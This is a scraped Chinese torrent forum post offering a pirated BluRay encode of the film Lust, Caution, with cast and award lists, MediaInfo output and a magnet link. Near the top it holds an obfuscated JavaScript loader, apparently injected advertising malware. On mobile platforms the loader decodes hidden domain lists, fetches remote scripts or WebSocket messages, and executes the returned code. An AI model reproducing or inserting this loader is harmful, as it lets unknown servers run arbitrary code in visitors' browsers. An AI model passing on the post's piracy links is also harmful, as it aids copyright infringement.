色,戒[国语配音/中文字幕].Lust.Caution.2007.1080p.BluRay.x265.10bit.DTS 10.39GB

版主小s 18天前 731

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 色,戒 / 色|戒 / 色·戒 / 色戒 / Lust, Caution

◎年 代 2007

◎产 地 中国台湾 / 中国大陆 / 美国 / 中国香港

◎类 别 剧情 / 爱情 / 情色

◎语 言 汉语普通话 / 上海话 / 英语 / 粤语 / 日语 / 印地语

◎上映日期 2007-11-01(中国大陆) / 2007-09-24(中国台湾) / 2007-09-26(中国香港) / 2007-08-30(威尼斯电影节) / 2007-10-26(美国)

◎IMDb链接 https://www.imdb.com/title/tt0808357/

◎豆瓣评分 8.5/10 (605328人评价)

◎豆瓣链接 https://movie.douban.com/subject/1828115/

◎片 长 158分钟

◎导 演 李安 Ang Lee (id:1054421)

◎编 剧 王蕙玲 Hui-Ling Wang (id:1300390)

詹姆斯·夏慕斯 James Schamus (id:1050276)

张爱玲 Eileen Chang (id:1076575)

◎演 员 梁朝伟 Tony Leung Chiu Wai (id:1115918)

汤唯 Wei Tang (id:1025141)

陈冲 Joan Chen (id:1044964)

王力宏 Lee-Hom Wang (id:1045243)

庹宗华 Chung-Hua Tou (id:1029349)

朱芷莹 Chih-ying Chu (id:1322666)

高英轩 Ven Kao (id:1317617)

柯宇纶 Lawrence Ko (id:1275416)

阮德锵 Johnson Yuen (id:1317685)

钱嘉乐 Kar Lok Chin (id:1025476)

苏岩 Yan Su (id:1309922)

何赛飞 Saifei He (id:1001393)

宋茹惠 Ruhui Song (id:1331832)

樊光耀 Kuang-Yao Fan (id:1275301)

卢燕 Lisa Lu (id:1014332)

刘洁 Jie Liu (id:1320879)

余娅 Ya Yu (id:1275474)

王琳 Lin Wang (id:1274775)

王侃 Kan Wang (id:1360590)

竹下明子 Akiko Takeshita (id:1018812)

阿努潘·凯尔 Anupam Kher (id:1054303)

韦奕波 Yibo Wei (id:1422829)

詹姆斯·夏慕斯 James Schamus (id:1050276)

王蕙玲 Hui-Ling Wang (id:1300390)

刘二东 Er-Dong Liu (id:1450423)

江志强 William Kong (id:1288870)

林炳坤 Bingkun Lin (id:1350348)

任仲伦 Zhonglun Ren (id:1333045)

谢家慧 Doris Tse (id:1388882)

宋岱 Dai Song (id:1395689)

李安 Ang Lee (id:1054421)

亚历山大·德斯普拉 Alexandre Desplat (id:1049972)

蔡崇晖 Johnny Choi (id:1318724)

罗德里戈·普列托 Rodrigo Prieto (id:1276623)

蒂姆·斯奎尔斯 Tim Squyres (id:1298208)

李岗 Khan Lee (id:1274686)

雷楚雄 Bill Lui (id:1290436)

刘世云 Sai-Wan Lau (id:1290170)

李健威 Kin-wai Lee (id:1326655)

吕凤珊 Fengshan Lü (id:1370031)

Synderella Peng Synderella Peng (id:1294238)

庄国荣 Kwok Wing Cheong (id:1280604)

朴若木 Lai Pan (id:1293875)

朴若木 Lai Pan (id:1293875)

卓翔 Cheuk Cheung (id:1316916)

刘永泰 Wing Tai Lau (id:1396875)

张进战 Jinzhan Zhang (id:1326433)

马特·斯科菲尔德 Matt Schofield (id:1305966)

黄伟辉 Wong Wai-Fai (id:1275163)

赖声川 Stan Lai (id:1274898)

潘迪华 Rebecca Pan (id:1274839)

◎标 签 情色 / 张爱玲 / 爱情 / 人性 / 文艺 / 剧情 / 经典 / 台湾

◎简 介

本是岭南大学学生的王佳芝(汤唯 饰)因战争辗转到了香港读书,她在香港大学加入了爱国青年邝裕民(王力宏 饰)组织的话剧组,他们主演的爱国话剧更激起了他们的爱国情操。当邝裕民得知汪伪政府的特务头子易先生(梁朝伟 饰)正在香港的时候,他们便密谋要刺杀易先生。化名“麦太太”的王佳芝很快得到了易太太(陈冲 饰)的信任与喜爱,同时美丽的“麦太太”也吸引了易先生的眼球,正当事情进行得如火如荼之际,易先生突然要回到上海去。

此后王佳芝一直生活在上海,没想到重遇了邝裕民。当得知刺杀行动还没结束时,王佳芝再次成为了特务,再次以“麦太太”的身份出现在易先生的面前。

重逢后的二人关系进一步发展,此时的易先生因爱上了王佳芝而对她毫无忌讳,王佳芝的内心也变得起伏不定。刺杀行动进行正顺利,但当易先生送给王佳芝璀璨钻戒表达爱意时,王佳芝做出了惊人的决定……

◎获奖情况 (共29项)

第64届威尼斯电影节 (2007)

金狮奖

└──李安 (id:1054421)

金奥赛拉奖 最佳摄影

└──罗德里戈·普列托 (id:1276623)

第65届金球奖 (2008)

电影类 最佳外语片(提名)

第44届台北金马影展 (2007)

金马奖 最佳剧情片

金马奖 最佳导演

└──李安 (id:1054421)

金马奖 最佳男主角

└──梁朝伟 (id:1115918)

金马奖 最佳女主角(提名)

└──汤唯 (id:1025141)

金马奖 最佳改编剧本

金马奖 最佳新演员

└──汤唯 (id:1025141)

金马奖 最佳摄影(提名)

└──罗德里戈·普列托 (id:1276623)

金马奖 最佳美术设计(提名)

└──朴若木 (id:1293875)

金马奖 最佳造型设计

金马奖 最佳原创配乐

└──亚历山大·德斯普拉 (id:1049972)

金马奖 最佳剪辑(提名)

└──蒂姆·斯奎尔斯 (id:1298208)

第27届香港电影金像奖 (2008)

最佳亚洲电影

第61届英国电影学院奖 (2008)

电影奖 最佳非英语片(提名)

电影奖 最佳服装设计(提名)

└──朴若木 (id:1293875)

第32届日本电影学院奖 (2009)

最佳外语片(提名)

第2届亚洲电影大奖 (2008)

最佳电影(提名)

最佳导演(提名)

└──李安 (id:1054421)

最佳男主角

└──梁朝伟 (id:1115918)

最佳女主角(提名)

└──汤唯 (id:1025141)

最佳编剧(提名)

最佳原创音乐(提名)

└──亚历山大·德斯普拉 (id:1049972)

第8届华语电影传媒大奖 (2008)

最佳电影(提名)

最佳导演(提名)

└──李安 (id:1054421)

最佳男主角(提名)

└──梁朝伟 (id:1115918)

最佳女主角(提名)

└──汤唯 (id:1025141)

最佳新演员

└──汤唯 (id:1025141)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 59189002933818225467233897893248583010 (0x2C876326EF9EB63FAE33E5B488D74562)

  4. Complete name : [email protected]kv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 10.4 GiB

  8. Duration : 2 h 38 min

  9. Overall bit rate : 9 395 kb/s

  10. Movie name : Lust, Caution 2007

  11. Encoded date : UTC 2021-10-02 06:53:24

  12. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@Main

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 2 h 38 min

  21. Bit rate : 7 859 kb/s

  22. Width : 1 920 pixels

  23. Height : 1 040 pixels

  24. Display aspect ratio : 1.85:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.164

  31. Stream size : 8.69 GiB (84%)

  32. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  33. Encoding settings : rc=crf / crf=17.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1040 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. ID in the original source medium : 4353 (0x1101)

  39. Format : DTS

  40. Format/Info : Digital Theater Systems

  41. Codec ID : A_DTS

  42. Duration : 2 h 38 min

  43. Bit rate mode : Constant

  44. Bit rate : 1 509 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : C L R Ls Rs LFE

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 93.750 FPS (512 SPF)

  49. Bit depth : 16 bits

  50. Compression mode : Lossy

  51. Delay relative to video : 1 s 818 ms

  52. Stream size : 1.67 GiB (16%)

  53. Title : Mandarin

  54. Language : Chinese

  55. Default : Yes

  56. Forced : No

  57. Original source medium : Blu-ray


  58. Text #1

  59. ID : 3

  60. Format : PGS

  61. Muxing mode : zlib

  62. Codec ID : S_HDMV/PGS

  63. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  64. Duration : 2 h 30 min

  65. Bit rate : 19.2 kb/s

  66. Count of elements : 2802

  67. Stream size : 20.7 MiB (0%)

  68. Title : chs

  69. Language : Chinese

  70. Default : Yes

  71. Forced : No


  72. Text #2

  73. ID : 4

  74. Format : PGS

  75. Muxing mode : zlib

  76. Codec ID : S_HDMV/PGS

  77. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  78. Duration : 2 h 30 min

  79. Bit rate : 19.5 kb/s

  80. Count of elements : 2802

  81. Stream size : 21.0 MiB (0%)

  82. Title : cht

  83. Language : Chinese

  84. Default : No

  85. Forced : No


  86. Text #3

  87. ID : 5

  88. ID in the original source medium : 4608 (0x1200)

  89. Format : PGS

  90. Muxing mode : zlib

  91. Codec ID : S_HDMV/PGS

  92. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  93. Duration : 2 h 28 min

  94. Bit rate : 20.6 kb/s

  95. Count of elements : 2538

  96. Stream size : 21.9 MiB (0%)

  97. Language : English

  98. Default : No

  99. Forced : No

  100. Original source medium : Blu-ray


  101. Menu

  102. 00:00:00.000 : Chapter 00

  103. 00:09:26.691 : Chapter 01

  104. 00:27:11.129 : Chapter 02

  105. 00:40:24.338 : Chapter 03

  106. 00:59:06.292 : Chapter 04

  107. 01:10:44.990 : Chapter 05

  108. 01:25:59.863 : Chapter 06

  109. 01:43:37.628 : Chapter 07

  110. 01:59:24.949 : Chapter 08

  111. 02:13:33.463 : Chapter 09

  112. 02:24:52.475 : Chapter 10




复制代码


TAGS 剧情 情色 爱情

磁力链:
  • magnet:?xt=urn:btih:3A51B7EB5D2C007A32659927A1B889FA704975E3
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (1)
  • coraje 6天前
    2
    好资源,感谢分享

你可以在 登录 or 注册 后,对此帖发表评论!

返回